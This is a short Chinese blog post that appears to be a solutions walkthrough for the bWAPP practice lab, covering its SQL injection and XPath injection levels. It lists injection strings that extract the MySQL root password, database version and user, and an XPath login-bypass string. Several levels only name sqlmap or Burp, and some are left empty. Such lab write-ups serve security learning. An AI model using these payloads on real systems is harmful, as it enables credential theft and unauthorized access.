Bwapp漏洞平台答案全解-A1(第三篇)

时间:2022-05-06
本文章向大家介绍Bwapp漏洞平台答案全解-A1(第三篇),主要内容包括1.21-SQL Injection - Stored (Blog)、1.22-SQL Injection - Stored (SQLite)、-1.23-SQL Injection - Stored (User-Agent)、-1.24-SQL Injection - Stored (XML)、-1.25-SQL Injection - Blind - Boolean-Based、*1.26-SQL Injection - Blind - Time-Based、-1.27-SQL Injection - Blind (SQLite)、-1.28-SQL Injection - Blind (WS/SOAP)、1.29-XML/XPath Injection (Login Form)、基本概念、基础应用、原理机制和需要注意的事项等,并结合实例形式分析了其使用技巧,希望通过本文能帮助到大家理解应用这部分内容。

0x01 A1 - Injection(第三次)

1.21-SQL Injection - Stored (Blog)

输入:test','test')#
candy','candy')#
candy',(select password from mysql.user where user='root'limit 0,1))#
candy',(select version()))#
candy',(select user()))#

1.22-SQL Injection - Stored (SQLite)

用SQLmap的图形界面+burp抓包存成文件可以跑出来

-1.23-SQL Injection - Stored (User-Agent)

在User-Agent上有注入

使用sqlmap的 --risk --level 可以检测出

-1.24-SQL Injection - Stored (XML)

burp扫描出结果

-1.25-SQL Injection - Blind - Boolean-Based

SQL盲注-基于布尔

*1.26-SQL Injection - Blind - Time-Based

时间盲注,未做手工测试,可自行百度,

使用sqlmap可跑

-1.27-SQL Injection - Blind (SQLite)

SQL盲注-

-1.28-SQL Injection - Blind (WS/SOAP)

1.29-XML/XPath Injection (Login Form)

用户名:whatever' or 1=1 or'

绕过登陆

随机文章
本站知识点必读
最近更新